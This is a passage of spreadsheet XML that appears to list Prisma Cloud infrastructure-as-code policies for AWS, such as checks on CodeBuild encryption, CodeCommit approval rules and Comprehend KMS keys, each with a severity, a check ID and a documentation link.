      <c r="AA718" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB718" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC718" t="inlineStr">
        <is>
          <t>CKV_AWS_158</t>
        </is>
      </c>
      <c r="AD718" t="b">
        <v>1</v>
      </c>
      <c r="AE718" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF718" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>4992e44c-587f-4549-916c-af956bc7a870</t>
        </is>
      </c>
      <c r="AI718" t="inlineStr"/>
      <c r="AJ718" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK718" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" t="inlineStr"/>
      <c r="B719" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C719" s="2" t="inlineStr"/>
      <c r="D719" t="inlineStr"/>
      <c r="E719" t="inlineStr"/>
      <c r="F719" t="inlineStr"/>
      <c r="G719" t="b">
        <v>1</v>
      </c>
      <c r="H7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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J719" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudwatch</t>
        </is>
      </c>
      <c r="K719" t="inlineStr">
        <is>
          <t>CloudWatch alarm actions are not enabled</t>
        </is>
      </c>
      <c r="L719" t="inlineStr"/>
      <c r="M719" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N719" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O719" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P719" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q719" t="inlineStr"/>
      <c r="R719" t="inlineStr"/>
      <c r="S719" t="inlineStr"/>
      <c r="T719" t="b">
        <v>0</v>
      </c>
      <c r="U719" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V719" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudwatch-metric-alarm</t>
        </is>
      </c>
      <c r="W719" t="inlineStr">
        <is>
          <t>Ensure that CloudWatch alarm actions are enabled</t>
        </is>
      </c>
      <c r="X719" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-319</t>
        </is>
      </c>
      <c r="Y719" t="inlineStr"/>
      <c r="Z719" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudwatch_metric_alarm"]}</t>
        </is>
      </c>
      <c r="AA719" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB719" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC719" t="inlineStr">
        <is>
          <t>CKV_AWS_319</t>
        </is>
      </c>
      <c r="AD719" t="b">
        <v>1</v>
      </c>
      <c r="AE719" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF719" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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19" t="inlineStr">
        <is>
          <t>9bb8259c-875a-4502-9b03-04682c312402</t>
        </is>
      </c>
      <c r="AI719" t="inlineStr"/>
      <c r="AJ719" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK719" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" t="inlineStr"/>
      <c r="B720" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C720" s="2" t="inlineStr"/>
      <c r="D720" t="inlineStr"/>
      <c r="E720" t="inlineStr"/>
      <c r="F720" t="inlineStr"/>
      <c r="G720" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J720" t="inlineStr">
        <is>
          <t>IaC:General:aws-codeartifact</t>
        </is>
      </c>
      <c r="K720" t="inlineStr">
        <is>
          <t>AWS Code Artifact Domain is not encrypted by KMS using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L720" t="inlineStr"/>
      <c r="M720" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N720" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O720" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P720" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q720" t="inlineStr"/>
      <c r="R720" t="inlineStr"/>
      <c r="S720" t="inlineStr"/>
      <c r="T720" t="b">
        <v>0</v>
      </c>
      <c r="U720" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V720" t="inlineStr">
        <is>
          <t>IaC:General:aws-codeartifact-domain</t>
        </is>
      </c>
      <c r="W720" t="inlineStr">
        <is>
          <t>Ensure Code artifact Domain is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X720" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-code-artifact-domain-is-encrypted-by-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y720" t="inlineStr"/>
      <c r="Z720" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codeartifact_domain"]}</t>
        </is>
      </c>
      <c r="AA720" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB720" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC720" t="inlineStr">
        <is>
          <t>CKV_AWS_221</t>
        </is>
      </c>
      <c r="AD720" t="b">
        <v>1</v>
      </c>
      <c r="AE720" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF720" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>1ffe4cbd-c86c-4a39-8f87-fab9554274cc</t>
        </is>
      </c>
      <c r="AI720" t="inlineStr"/>
      <c r="AJ720" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK720" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" t="inlineStr"/>
      <c r="B721" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C721" s="2" t="inlineStr"/>
      <c r="D721" t="inlineStr"/>
      <c r="E721" t="inlineStr"/>
      <c r="F721" t="inlineStr"/>
      <c r="G721" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J721" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild</t>
        </is>
      </c>
      <c r="K721" t="inlineStr">
        <is>
          <t>CodeBuild projects are not encrypted</t>
        </is>
      </c>
      <c r="L721" t="inlineStr"/>
      <c r="M721" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N721" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O721" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P721" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q721" t="inlineStr"/>
      <c r="R721" t="inlineStr"/>
      <c r="S721" t="inlineStr"/>
      <c r="T721" t="b">
        <v>0</v>
      </c>
      <c r="U721" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V721" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild-project</t>
        </is>
      </c>
      <c r="W721" t="inlineStr">
        <is>
          <t>Ensure that CodeBuild projects are encrypted</t>
        </is>
      </c>
      <c r="X721" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-codebuild-projects-are-encrypted-1</t>
        </is>
      </c>
      <c r="Y721" t="inlineStr"/>
      <c r="Z721" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codebuild_project"]}</t>
        </is>
      </c>
      <c r="AA721" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB721" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC721" t="inlineStr">
        <is>
          <t>CKV_AWS_147</t>
        </is>
      </c>
      <c r="AD721" t="b">
        <v>1</v>
      </c>
      <c r="AE721" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF721" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>f3ea3f78-f069-4d78-8c9d-8ca502f0b43b</t>
        </is>
      </c>
      <c r="AI721" t="inlineStr"/>
      <c r="AJ721" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK721" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" t="inlineStr"/>
      <c r="B722" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C722" s="2" t="inlineStr"/>
      <c r="D722" t="inlineStr"/>
      <c r="E722" t="inlineStr"/>
      <c r="F722" t="inlineStr"/>
      <c r="G722" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J722" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild</t>
        </is>
      </c>
      <c r="K722" t="inlineStr">
        <is>
          <t>CodeBuild project encryption is disabled</t>
        </is>
      </c>
      <c r="L722" t="inlineStr"/>
      <c r="M722" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N722" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O722" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P722" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q722" t="inlineStr"/>
      <c r="R722" t="inlineStr"/>
      <c r="S722" t="inlineStr"/>
      <c r="T722" t="b">
        <v>0</v>
      </c>
      <c r="U722" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V722" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild-project</t>
        </is>
      </c>
      <c r="W722" t="inlineStr">
        <is>
          <t>Ensure that CodeBuild Project encryption is not disabled</t>
        </is>
      </c>
      <c r="X722" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30</t>
        </is>
      </c>
      <c r="Y722" t="inlineStr"/>
      <c r="Z722" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codebuild_project"]}</t>
        </is>
      </c>
      <c r="AA722" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB722" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC722" t="inlineStr">
        <is>
          <t>CKV_AWS_78</t>
        </is>
      </c>
      <c r="AD722" t="b">
        <v>1</v>
      </c>
      <c r="AE722" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF722" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>1d84f4c4-fc12-40e5-9b65-44c05b7dafc3</t>
        </is>
      </c>
      <c r="AI722" t="inlineStr"/>
      <c r="AJ722" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK722" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" t="inlineStr"/>
      <c r="B723" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C723" s="2" t="inlineStr"/>
      <c r="D723" t="inlineStr"/>
      <c r="E723" t="inlineStr"/>
      <c r="F723" t="inlineStr"/>
      <c r="G723" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J723" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild</t>
        </is>
      </c>
      <c r="K723" t="inlineStr">
        <is>
          <t>CodeBuild S3 logs are not encrypted</t>
        </is>
      </c>
      <c r="L723" t="inlineStr"/>
      <c r="M723" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N723" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O723" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P723" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q723" t="inlineStr"/>
      <c r="R723" t="inlineStr"/>
      <c r="S723" t="inlineStr"/>
      <c r="T723" t="b">
        <v>0</v>
      </c>
      <c r="U723" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V723" t="inlineStr">
        <is>
          <t>IaC:General:aws-codebuild-project</t>
        </is>
      </c>
      <c r="W723" t="inlineStr">
        <is>
          <t>Ensure that CodeBuild S3 logs are encrypted</t>
        </is>
      </c>
      <c r="X723" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-311</t>
        </is>
      </c>
      <c r="Y723" t="inlineStr"/>
      <c r="Z723" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codebuild_project"]}</t>
        </is>
      </c>
      <c r="AA723" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB723" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC723" t="inlineStr">
        <is>
          <t>CKV_AWS_311</t>
        </is>
      </c>
      <c r="AD723" t="b">
        <v>1</v>
      </c>
      <c r="AE723" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF723" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>2f2a5214-eafd-42aa-b2bd-5a84155316d3</t>
        </is>
      </c>
      <c r="AI723" t="inlineStr"/>
      <c r="AJ723" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK723" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" t="inlineStr"/>
      <c r="B724" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C724" s="2" t="inlineStr"/>
      <c r="D724" t="inlineStr"/>
      <c r="E724" t="inlineStr"/>
      <c r="F724" t="inlineStr"/>
      <c r="G724" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J724" t="inlineStr">
        <is>
          <t>IaC:General:aws-codecommit</t>
        </is>
      </c>
      <c r="K724" t="inlineStr">
        <is>
          <t>AWS Codecommit branch changes has less than 2 approvals</t>
        </is>
      </c>
      <c r="L724" t="inlineStr"/>
      <c r="M724" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N724" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O724" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P724" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q724" t="inlineStr"/>
      <c r="R724" t="inlineStr"/>
      <c r="S724" t="inlineStr"/>
      <c r="T724" t="b">
        <v>0</v>
      </c>
      <c r="U724" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V724" t="inlineStr">
        <is>
          <t>IaC:General:aws-codecommit-approval-rule-template</t>
        </is>
      </c>
      <c r="W724" t="inlineStr">
        <is>
          <t>Ensure codecommit branch changes have at least 2 approvals</t>
        </is>
      </c>
      <c r="X724" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-codecommit-branch-changes-have-at-least-2-approvals</t>
        </is>
      </c>
      <c r="Y724" t="inlineStr"/>
      <c r="Z724" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codecommit_approval_rule_template"]}</t>
        </is>
      </c>
      <c r="AA724" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB724" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC724" t="inlineStr">
        <is>
          <t>CKV_AWS_257</t>
        </is>
      </c>
      <c r="AD724" t="b">
        <v>1</v>
      </c>
      <c r="AE724" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF724" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>a073098f-43a4-4de5-80e5-24f75b4a87eb</t>
        </is>
      </c>
      <c r="AI724" t="inlineStr"/>
      <c r="AJ724" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK724" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" t="inlineStr"/>
      <c r="B725" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C725" s="2" t="inlineStr"/>
      <c r="D725" t="inlineStr"/>
      <c r="E725" t="inlineStr"/>
      <c r="F725" t="inlineStr"/>
      <c r="G725" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J725" t="inlineStr">
        <is>
          <t>IaC:General:aws-codecommit</t>
        </is>
      </c>
      <c r="K725" t="inlineStr">
        <is>
          <t>AWS Codecommit is not associated with an approval rule</t>
        </is>
      </c>
      <c r="L725" t="inlineStr"/>
      <c r="M725" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N725" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O725" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P725" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q725" t="inlineStr"/>
      <c r="R725" t="inlineStr"/>
      <c r="S725" t="inlineStr"/>
      <c r="T725" t="b">
        <v>0</v>
      </c>
      <c r="U725" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V725" t="inlineStr">
        <is>
          <t>IaC:General:aws-codecommit-repository,aws-codecommit-approval-rule-template-association</t>
        </is>
      </c>
      <c r="W725" t="inlineStr">
        <is>
          <t>Ensure Codecommit associates an approval rule</t>
        </is>
      </c>
      <c r="X725" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-codecommit-is-associated-with-an-approval-rule</t>
        </is>
      </c>
      <c r="Y725" t="inlineStr"/>
      <c r="Z725" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codecommit_repository","aws_codecommit_approval_rule_template_association"]}</t>
        </is>
      </c>
      <c r="AA725" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB725" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC725" t="inlineStr">
        <is>
          <t>CKV2_AWS_37</t>
        </is>
      </c>
      <c r="AD725" t="b">
        <v>1</v>
      </c>
      <c r="AE725" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF725" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>87313f9c-7cfd-4fab-8053-786907c92ec4</t>
        </is>
      </c>
      <c r="AI725" t="inlineStr"/>
      <c r="AJ725" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK725" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" t="inlineStr"/>
      <c r="B726" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C726" s="2" t="inlineStr"/>
      <c r="D726" t="inlineStr"/>
      <c r="E726" t="inlineStr"/>
      <c r="F726" t="inlineStr"/>
      <c r="G726" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J726" t="inlineStr">
        <is>
          <t>IaC:General:aws-codepipeline</t>
        </is>
      </c>
      <c r="K726" t="inlineStr">
        <is>
          <t>AWS CodePipeline artifactStore is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L726" t="inlineStr"/>
      <c r="M726" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N726" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O726" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P726" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q726" t="inlineStr"/>
      <c r="R726" t="inlineStr"/>
      <c r="S726" t="inlineStr"/>
      <c r="T726" t="b">
        <v>0</v>
      </c>
      <c r="U726" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V726" t="inlineStr">
        <is>
          <t>IaC:General:aws-codepipeline</t>
        </is>
      </c>
      <c r="W726" t="inlineStr">
        <is>
          <t>Ensure Code Pipeline Artifact store is using a KMS CMK</t>
        </is>
      </c>
      <c r="X726" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-codepipeline-artifactstore-is-not-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y726" t="inlineStr"/>
      <c r="Z726" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_codepipeline"]}</t>
        </is>
      </c>
      <c r="AA726" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB726" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC726" t="inlineStr">
        <is>
          <t>CKV_AWS_219</t>
        </is>
      </c>
      <c r="AD726" t="b">
        <v>1</v>
      </c>
      <c r="AE726" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF726" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>5484b84b-ec1e-42e5-88e4-b3055a93c5a2</t>
        </is>
      </c>
      <c r="AI726" t="inlineStr"/>
      <c r="AJ726" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK726" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" t="inlineStr"/>
      <c r="B727" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C727" s="2" t="inlineStr"/>
      <c r="D727" t="inlineStr"/>
      <c r="E727" t="inlineStr"/>
      <c r="F727" t="inlineStr"/>
      <c r="G727" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J727" t="inlineStr">
        <is>
          <t>IaC:General:aws-comprehend</t>
        </is>
      </c>
      <c r="K727" t="inlineStr">
        <is>
          <t>Comprehend Entity Recognizer's volume is not encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="L727" t="inlineStr"/>
      <c r="M727" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N727" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O727" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P727" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q727" t="inlineStr"/>
      <c r="R727" t="inlineStr"/>
      <c r="S727" t="inlineStr"/>
      <c r="T727" t="b">
        <v>0</v>
      </c>
      <c r="U727" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V727" t="inlineStr">
        <is>
          <t>IaC:General:aws-comprehend-entity-recognizer</t>
        </is>
      </c>
      <c r="W727" t="inlineStr">
        <is>
          <t>Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X727" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-268</t>
        </is>
      </c>
      <c r="Y727" t="inlineStr"/>
      <c r="Z727" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_comprehend_entity_recognizer"]}</t>
        </is>
      </c>
      <c r="AA727" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB727" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC727" t="inlineStr">
        <is>
          <t>CKV_AWS_268</t>
        </is>
      </c>
      <c r="AD727" t="b">
        <v>1</v>
      </c>
      <c r="AE727" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF727" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>6b4b54a6-fdf4-45fe-900b-eef13fee6304</t>
        </is>
      </c>
      <c r="AI727" t="inlineStr"/>
      <c r="AJ727" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK727" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" t="inlineStr"/>
      <c r="B728" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C728" s="2" t="inlineStr"/>
      <c r="D728" t="inlineStr"/>
      <c r="E728" t="inlineStr"/>
      <c r="F728" t="inlineStr"/>
      <c r="G728" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J728" t="inlineStr">
        <is>
          <t>IaC:General:aws-comprehend</t>
        </is>
      </c>
      <c r="K728" t="inlineStr">
        <is>
          <t>Comprehend Entity Recognizer's model is not encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="L728" t="inlineStr"/>
      <c r="M728" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N728" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O728" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P728" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q728" t="inlineStr"/>
      <c r="R728" t="inlineStr"/>
      <c r="S728" t="inlineStr"/>
      <c r="T728" t="b">
        <v>0</v>
      </c>
      <c r="U728" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V728" t="inlineStr">
        <is>
          <t>IaC:General:aws-comprehend-entity-recognizer</t>
        </is>
      </c>
      <c r="W728" t="inlineStr">
        <is>
          <t>Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X728" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-267</t>
        </is>
      </c>
      <c r="Y728" t="inlineStr"/>
      <c r="Z728" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_comprehend_entity_recognizer"]}</t>
        </is>
      </c>
      <c r="AA728" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB728" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC728" t="inlineStr">
        <is>
          <t>CKV_AWS_267</t>
        </is>
      </c>
      <c r="AD728" t="b">
        <v>1</v>
      </c>
      <c r="AE728" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF728" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>0fbde6f9-78ad-41c7-8be7-9bc589c66320</t>
        </is>
      </c>
      <c r="AI728" t="inlineStr"/>
